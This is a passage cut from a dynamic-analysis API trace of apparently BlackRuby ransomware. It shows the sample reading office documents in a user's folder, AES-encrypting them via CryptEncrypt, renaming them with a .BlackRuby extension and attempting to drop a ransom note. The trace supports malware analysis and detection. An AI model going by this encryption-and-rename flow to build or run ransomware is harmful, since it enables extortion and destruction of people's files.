"c:\\users\\eebsym5\\documents\\xg_vg78dsgvcqj kci.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0058.164] GetLastError () returned 0x0 [0058.164] GetFileType (hFile=0x184) returned 0x1 [0058.164] SetErrorMode (uMode=0x0) returned 0x1 [0058.164] GetFileType (hFile=0x184) returned 0x1 [0058.164] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x13c4c [0058.165] GetLastError () returned 0x0 [0058.165] ReadFile (in: hFile=0x184, lpBuffer=0x1b42010, nNumberOfBytesToRead=0x13c4c, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1b42010*, lpNumberOfBytesRead=0x18ed84*=0x13c4c, lpOverlapped=0x0) returned 1 [0058.165] GetLastError () returned 0x0 [0058.165] CloseHandle (hObject=0x184) returned 1 [0058.166] GetLastError () returned 0x0 [0058.166] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\xg_vG78DSGvcqj KCI.docx", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\xg_vG78DSGvcqj KCI.docx", lpFilePart=0x0) returned 0x32 [0058.166] GetLastError () returned 0x0 [0058.166] SetErrorMode (uMode=0x1) returned 0x0 [0058.166] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\xg_vG78DSGvcqj KCI.docx" (normalized: "c:\\users\\eebsym5\\documents\\xg_vg78dsgvcqj kci.docx"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4655cb0, ftCreationTime.dwHighDateTime=0x1d33481, ftLastAccessTime.dwLowDateTime=0xc65b8df0, ftLastAccessTime.dwHighDateTime=0x1d39d5b, ftLastWriteTime.dwLowDateTime=0xc65b8df0, ftLastWriteTime.dwHighDateTime=0x1d39d5b, nFileSizeHigh=0x0, nFileSizeLow=0x13c4c)) returned 1 [0058.166] GetLastError () returned 0x0 [0058.166] SetErrorMode (uMode=0x0) returned 0x1 [0058.166] CryptAcquireContextW (in: phProv=0x18ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ed4c*=0x37c818) returned 1 [0058.166] GetLastError () returned 0x0 [0058.201] CryptImportKey (in: hProv=0x37c818, pbData=0x1bc3c7c, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360d20) returned 1 [0058.201] GetLastError () returned 0x0 [0058.201] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0058.201] GetLastError () returned 0x0 [0058.206] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0058.206] GetLastError () returned 0x0 [0058.206] CryptDuplicateKey (in: hKey=0x360d20, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360aa0) returned 1 [0058.206] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0058.206] GetLastError () returned 0x0 [0058.206] CryptSetKeyParam (hKey=0x360aa0, dwParam=0x4, pbData=0x1bf0cc8*=0x1, dwFlags=0x0) returned 1 [0058.206] GetLastError () returned 0x0 [0058.206] CryptSetKeyParam (hKey=0x360aa0, dwParam=0x1, pbData=0x1bf0c94, dwFlags=0x0) returned 1 [0058.206] GetLastError () returned 0x0 [0058.206] CryptEncrypt (in: hKey=0x360aa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1bf0d10*, pdwDataLen=0x18ed74*=0x13d40, dwBufLen=0x13d40 | out: pbData=0x1bf0d10*, pdwDataLen=0x18ed74*=0x13d40) returned 1 [0058.207] GetLastError () returned 0x0 [0058.207] CryptEncrypt (in: hKey=0x360aa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c187bc*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1c187bc*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0058.207] GetLastError () returned 0x0 [0058.207] CryptEncrypt (in: hKey=0x360aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c187ec*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1c187ec*, pdwDataLen=0x18ed94*=0x10) returned 1 [0058.207] GetLastError () returned 0x0 [0058.207] CryptDestroyKey (hKey=0x360d20) returned 1 [0058.207] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0058.207] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0058.207] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\xg_vG78DSGvcqj KCI.docx", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\xg_vG78DSGvcqj KCI.docx", lpFilePart=0x0) returned 0x32 [0058.207] GetLastError () returned 0x0 [0058.208] SetErrorMode (uMode=0x1) returned 0x0 [0058.208] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\xg_vG78DSGvcqj KCI.docx" (normalized: "c:\\users\\eebsym5\\documents\\xg_vg78dsgvcqj kci.docx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0058.209] GetLastError () returned 0xb7 [0058.209] GetFileType (hFile=0x184) returned 0x1 [0058.209] SetErrorMode (uMode=0x0) returned 0x1 [0058.209] GetFileType (hFile=0x184) returned 0x1 [0058.210] CloseHandle (hObject=0x184) returned 1 [0058.211] GetLastError () returned 0xb7 [0058.211] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\xg_vG78DSGvcqj KCI.docx", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\xg_vG78DSGvcqj KCI.docx", lpFilePart=0x0) returned 0x32 [0058.211] GetLastError () returned 0xb7 [0058.211] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Encrypted_fdUvxbUZlA8tKLUQpPWyKTCSn5O1C5RUrftCiSr7CCoaH.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Encrypted_fdUvxbUZlA8tKLUQpPWyKTCSn5O1C5RUrftCiSr7CCoaH.BlackRuby", lpFilePart=0x0) returned 0x5c [0058.211] GetLastError () returned 0xb7 [0058.211] SetErrorMode (uMode=0x1) returned 0x0 [0058.211] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\xg_vG78DSGvcqj KCI.docx" (normalized: "c:\\users\\eebsym5\\documents\\xg_vg78dsgvcqj kci.docx"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4655cb0, ftCreationTime.dwHighDateTime=0x1d33481, ftLastAccessTime.dwLowDateTime=0xc65b8df0, ftLastAccessTime.dwHighDateTime=0x1d39d5b, ftLastWriteTime.dwLowDateTime=0x2ae45b80, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x13d50)) returned 1 [0058.211] GetLastError () returned 0xb7 [0058.211] SetErrorMode (uMode=0x0) returned 0x1 [0058.211] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Documents\\xg_vG78DSGvcqj KCI.docx" (normalized: "c:\\users\\eebsym5\\documents\\xg_vg78dsgvcqj kci.docx"), lpNewFileName="C:\\Users\\EEBsYm5\\Documents\\Encrypted_fdUvxbUZlA8tKLUQpPWyKTCSn5O1C5RUrftCiSr7CCoaH.BlackRuby" (normalized: "c:\\users\\eebsym5\\documents\\encrypted_fduvxbuzla8tkluqppwyktcsn5o1c5rurftcisr7ccoah.blackruby")) returned 1 [0058.211] GetLastError () returned 0xb7 [0058.212] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x33 [0058.212] GetLastError () returned 0xb7 [0058.212] SetErrorMode (uMode=0x1) returned 0x0 [0058.212] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\documents\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0058.212] GetLastError () returned 0x5 [0058.212] SetErrorMode (uMode=0x0) returned 0x1 [0058.213] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\XPO5E_VnaPfJ89 ZvJX.xlsx", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\XPO5E_VnaPfJ89 ZvJX.xlsx", lpFilePart=0x0) returned 0x33 [0058.213] GetLastError () returned 0x5 [0058.213] SetErrorMode (uMode=0x1) returned 0x0 [0058.213] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\XPO5E_VnaPfJ89 ZvJX.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\xpo5e_vnapfj89 zvjx.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x1c496a0 | out: lpFileInformation=0x1c496a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x639dcb70, ftCreationTime.dwHighDateTime=0x1d33932, ftLastAccessTime.dwLowDateTime=0xb0114660, ftLastAccessTime.dwHighDateTime=0x1d38501, ftLastWriteTime.dwLowDateTime=0xb0114660, ftLastWriteTime.dwHighDateTime=0x1d38501, nFileSizeHigh=0x0, nFileSizeLow=0x789c)) returned 1 [0058.213] GetLastError () returned 0x5 [0058.213] SetErrorMode (uMode=0x0) returned 0x1 [0058.213] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\XPO5E_VnaPfJ89 ZvJX.xlsx", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\XPO5E_VnaPfJ89 ZvJX.xlsx", lpFilePart=0x0) returned 0x33 [0058.213] GetLastError () returned 0x5 [0058.213] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\XPO5E_VnaPfJ89 ZvJX.xlsx", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\XPO5E_VnaPfJ89 ZvJX.xlsx", lpFilePart=0x0) returned 0x33 [0058.213] GetLastError () returned 0x5 [0058.213] SetErrorMode (uMode=0x1) returned 0x0 [0058.213] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\XPO5E_VnaPfJ89 ZvJX.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\xpo5e_vnapfj89 zvjx.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0058.213] GetLastError () returned 0x0 [0058.213] GetFileType (hFile=0x184) returned 0x1 [0058.213] SetErrorMode (uMode=0x0) returned 0x1 [0058.213] GetFileType (hFile=0x184) returned 0x1 [0058.213] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x789c [0058.213] GetLastError () returned 0x0 [0058.213] ReadFile (in: hFile=0x184, lpBuffer=0x1c4b380, nNumberOfBytesToRead=0x789c, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1c4b380*, lpNumberOfBytesRead=0x18ed84*=0x789c, lpOverlapped=0x0) returned 1 [0058.214] GetLastError () returned 0x0 [0058.214] CloseHandle (hObject=0x184) returned 1 [0058.214] GetLastError () returned 0x0 [0058.214] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\XPO5E_VnaPfJ89 ZvJX.xlsx", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\XPO5E_VnaPfJ89 ZvJX.xlsx", lpFilePart=0x0) returned 0x33 [0058.214] GetLastError () returned 0x0 [0058.214] SetErrorMode (uMode=0x1) returned 0x0 [0058.214] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\XPO5E_VnaPfJ89 ZvJX.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\xpo5e_vnapfj89 zvjx.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x639dcb70, ftCreationTime.dwHighDateTime=0x1d33932, ftLastAccessTime.dwLowDateTime=0xb0114660, ftLastAccessTime.dwHighDateTime=0x1d38501, ftLastWriteTime.dwLowDateTime=0xb0114660, ftLastWriteTime.dwHighDateTime=0x1d38501, nFileSizeHigh=0x0, nFileSizeLow=0x789c)) returned 1 [0058.214] GetLastError () returned 0x0 [0058.214] SetErrorMode (uMode=0x0) returned 0x1 [0058.225] CryptImportKey (in: hProv=0x37c790, pbData=0x1cb488c, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360ee0) returned 1 [0058.225] GetLastError () returned 0x0 [0058.225] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0058.225] GetLastError () returned 0x0 [0058.230] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0058.230] GetLastError () returned 0x0 [0058.230] CryptDuplicateKey (in: hKey=0x360ee0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360ea0) returned 1 [0058.230] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0058.230] GetLastError () returned 0x0 [0058.230] CryptSetKeyParam (hKey=0x360ea0, dwParam=0x4, pbData=0x1ce18d8*=0x1, dwFlags=0x0) returned 1 [0058.230] GetLastError () returned 0x0 [0058.230] CryptSetKeyParam (hKey=0x360ea0, dwParam=0x1, pbData=0x1ce18a4, dwFlags=0x0) returned 1 [0058.230] GetLastError () returned 0x0 [0058.230] CryptEncrypt (in: hKey=0x360ea0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1ce1920*, pdwDataLen=0x18ed74*=0x7990, dwBufLen=0x7990 | out: pbData=0x1ce1920*, pdwDataLen=0x18ed74*=0x7990) returned 1 [0058.230] GetLastError () returned 0x0 [0058.230] CryptEncrypt (in: hKey=0x360ea0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1cf0c6c*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1cf0c6c*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0058.230] GetLastError () returned 0x0 [0058.231] CryptEncrypt (in: hKey=0x360ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1cf0c9c*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1cf0c9c*, pdwDataLen=0x18ed94*=0x10) returned 1 [0058.231] GetLastError () returned 0x0 [0058.231] CryptDestroyKey (hKey=0x360ee0) returned 1 [0058.231] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0058.231] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0058.231] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\XPO5E_VnaPfJ89 ZvJX.xlsx", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\XPO5E_VnaPfJ89 ZvJX.xlsx", lpFilePart=0x0) returned 0x33 [0058.231] GetLastError () returned 0x0 [0058.231] SetErrorMode (uMode=0x1) returned 0x0 [0058.232] GetFileType (hFile=0x184) returned 0x1 [0058.232] GetFileType (hFile=0x184) returned 0x1 [0058.233] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Documents\\XPO5E_VnaPfJ89 ZvJX.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\xpo5e_vnapfj89 zvjx.xlsx"), lpNewFileName="C:\\Users\\EEBsYm5\\Documents\\Encrypted_SUW93e5N7noCmFpBygjDqPc42TVz3QoN36w9kVYB.BlackRuby" (normalized: "c:\\users\\eebsym5\\documents\\encrypted_suw93e5n7nocmfpbygjdqpc42tvz3qon36w9kvyb.blackruby")) returned 1 [0058.233] GetLastError () returned 0xb7 [0058.237] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x33 [0058.237] GetLastError () returned 0xb7 [0058.237] SetErrorMode (uMode=0x1) returned 0x0 [0058.237] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\documents\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0058.237] GetLastError () returned 0x5 [0058.238] SetErrorMode (uMode=0x0) returned 0x1 [0058.239] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\_kYk8u75WWnuzgu H_p.pptx", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\_kYk8u75WWnuzgu H_p.pptx", lpFilePart=0x0) returned 0x33 [0058.239] GetLastError () returned 0x5 [0058.239] SetErrorMode (uMode=0x1) returned 0x0 [0058.239] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\_kYk8u75WWnuzgu H_p.pptx" (normalized: "c:\\users\\eebsym5\\documents\\_kyk8u75wwnuzgu h_p.pptx"), fInfoLevelId=0x0, lpFileInformation=0x1b283b8 | out: lpFileInformation=0x1b283b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf92a9b50, ftCreationTime.dwHighDateTime=0x1d35093, ftLastAccessTime.dwLowDateTime=0xc5b82f60, ftLastAccessTime.dwHighDateTime=0x1d316cf, ftLastWriteTime.dwLowDateTime=0xc5b82f60, ftLastWriteTime.dwHighDateTime=0x1d316cf, nFileSizeHigh=0x0, nFileSizeLow=0x1598d)) returned 1 [0058.239] GetLastError () returned 0x5 [0058.239] SetErrorMode (uMode=0x0) returned 0x1 [0058.239] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\_kYk8u75WWnuzgu H_p.pptx", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\_kYk8u75WWnuzgu H_p.pptx", lpFilePart=0x0) returned 0x33 [0058.239] GetLastError () returned 0x5 [0058.239] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\_kYk8u75WWnuzgu H_p.pptx", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\_kYk8u75WWnuzgu H_p.pptx", lpFilePart=0x0) returned 0x33 [0058.239] GetLastError () returned 0x5 [0058.239] SetErrorMode (uMode=0x1) returned 0x0 [0058.239] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\_kYk8u75WWnuzgu H_p.pptx" (normalized: "c:\\users\\eebsym5\\documents\\_kyk8u75wwnuzgu h_p.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0058.239] GetLastError () returned 0x0 [0058.239] GetFileType (hFile=0x184) returned 0x1 [0058.239] SetErrorMode (uMode=0x0) returned 0x1 [0058.239] GetFileType (hFile=0x184) returned 0x1 [0058.239] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x1598d [0058.239] GetLastError () returned 0x0 [0058.240] ReadFile (in: hFile=0x184, lpBuffer=0x2b4f480, nNumberOfBytesToRead=0x1598d, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x2b4f480*, lpNumberOfBytesRead=0x18ed84*=0x1598d, lpOverlapped=0x0) returned 1 [0058.241] GetLastError () returned 0x0 [0058.241] CloseHandle (hObject=0x184) returned 1 [0058.241] GetLastError () returned 0x0 [0058.242] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\_kYk8u75WWnuzgu H_p.pptx", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\_kYk8u75WWnuzgu H_p.pptx", lpFilePart=0x0) returned 0x33 [0058.242] GetLastError () returned 0x0 [0058.242] SetErrorMode (uMode=0x1) returned 0x0 [0058.242] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\_kYk8u75WWnuzgu H_p.pptx" (normalized: "c:\\users\\eebsym5\\documents\\_kyk8u75wwnuzgu h_p.pptx"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf92a9b50, ftCreationTime.dwHighDateTime=0x1d35093, ftLastAccessTime.dwLowDateTime=0xc5b82f60, ftLastAccessTime.dwHighDateTime=0x1d316cf, ftLastWriteTime.dwLowDateTime=0xc5b82f60, ftLastWriteTime.dwHighDateTime=0x1d316cf, nFileSizeHigh=0x0, nFileSizeLow=0x1598d)) returned 1 [0058.242] GetLastError () returned 0x0 [0058.242] SetErrorMode (uMode=0x0) returned 0x1 [0058.242] CryptAcquireContextW (in: phProv=0x18ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ed4c*=0x37c790) returned 1 [0058.242] GetLastError () returned 0x0 [0058.276] CryptImportKey (in: hProv=0x37c790, pbData=0x1b845f0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360de0) returned 1 [0058.276] GetLastError () returned 0x0 [0058.276] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0058.276] GetLastError () returned 0x0 [0058.281] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0058.281] GetLastError () returned 0x0 [0058.281] CryptDuplicateKey (in: hKey=0x360de0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360ae0) returned 1 [0058.281] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0058.281] GetLastError () returned 0x0 [0058.281] CryptSetKeyParam (hKey=0x360ae0, dwParam=0x4, pbData=0x1bb163c*=0x1, dwFlags=0x0) returned 1 [0058.281] GetLastError () returned 0x0 [0058.281] CryptSetKeyParam (hKey=0x360ae0, dwParam=0x1, pbData=0x1bb1608, dwFlags=0x0) returned 1 [0058.281] GetLastError () returned 0x0 [0058.282] CryptEncrypt (in: hKey=0x360ae0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2b7a8e0*, pdwDataLen=0x18ed74*=0x15a80, dwBufLen=0x15a80 | out: pbData=0x2b7a8e0*, pdwDataLen=0x18ed74*=0x15a80) returned 1 [0058.282] GetLastError () returned 0x0 [0058.283] CryptEncrypt (in: hKey=0x360ae0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1bb1698*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1bb1698*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0058.283] GetLastError () returned 0x0 [0058.283] CryptEncrypt (in: hKey=0x360ae0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1bb16c8*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1bb16c8*, pdwDataLen=0x18ed94*=0x10) returned 1 [0058.283] GetLastError () returned 0x0 [0058.284] CryptDestroyKey (hKey=0x360de0) returned 1 [0058.284] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0058.284] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0058.284] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\_kYk8u75WWnuzgu H_p.pptx", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\_kYk8u75WWnuzgu H_p.pptx", lpFilePart=0x0) returned 0x33 [0058.284] GetLastError () returned 0x0 [0058.284] SetErrorMode (uMode=0x1) returned 0x0 [0058.284] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\_kYk8u75WWnuzgu H_p.pptx" (normalized: "c:\\users\\eebsym5\\documents\\_kyk8u75wwnuzgu h_p.pptx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0058.285] GetLastError () returned 0xb7 [0058.285] GetFileType (hFile=0x184) returned 0x1 [0058.285] SetErrorMode (uMode=0x0) returned 0x1 [0058.285] GetFileType (hFile=0x184) returned 0x1 [0058.287] CloseHandle (hObject=0x184) returned 1 [0058.287] GetLastError () returned 0xb7 [0058.287] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\_kYk8u75WWnuzgu H_p.pptx", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\_kYk8u75WWnuzgu H_p.pptx", lpFilePart=0x0) returned 0x33 [0058.287] GetLastError () returned 0xb7 [0058.287] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Encrypted_Y0998YcDWd2WuxCDCWjKSeS7x8iY1rzqouHoro0zsp.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Encrypted_Y0998YcDWd2WuxCDCWjKSeS7x8iY1rzqouHoro0zsp.BlackRuby", lpFilePart=0x0) returned 0x59 [0058.287] GetLastError () returned 0xb7 [0058.287] SetErrorMode (uMode=0x1) returned 0x0 [0058.287] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\_kYk8u75WWnuzgu H_p.pptx" (normalized: "c:\\users\\eebsym5\\documents\\_kyk8u75wwnuzgu h_p.pptx"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf92a9b50, ftCreationTime.dwHighDateTime=0x1d35093, ftLastAccessTime.dwLowDateTime=0xc5b82f60, ftLastAccessTime.dwHighDateTime=0x1d316cf, ftLastWriteTime.dwLowDateTime=0x2af04260, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x15a90)) returned 1 [0058.287] GetLastError () returned 0xb7 [0058.287] SetErrorMode (uMode=0x0) returned 0x1 [0058.287] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Documents\\_kYk8u75WWnuzgu H_p.pptx" (normalized: "c:\\users\\eebsym5\\documents\\_kyk8u75wwnuzgu h_p.pptx"), lpNewFileName="C:\\Users\\EEBsYm5\\Documents\\Encrypted_Y0998YcDWd2WuxCDCWjKSeS7x8iY1rzqouHoro0zsp.BlackRuby" (normalized: "c:\\users\\eebsym5\\documents\\encrypted_y0998ycdwd2wuxcdcwjkses7x8iy1rzqouhoro0zsp.blackruby")) returned 1 [0058.288] GetLastError () returned 0xb7 [0058.288] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x33 [0058.288] GetLastError () returned 0xb7 [0058.288] SetErrorMode (uMode=0x1) returned 0x0 [0058.288] CreateFileW 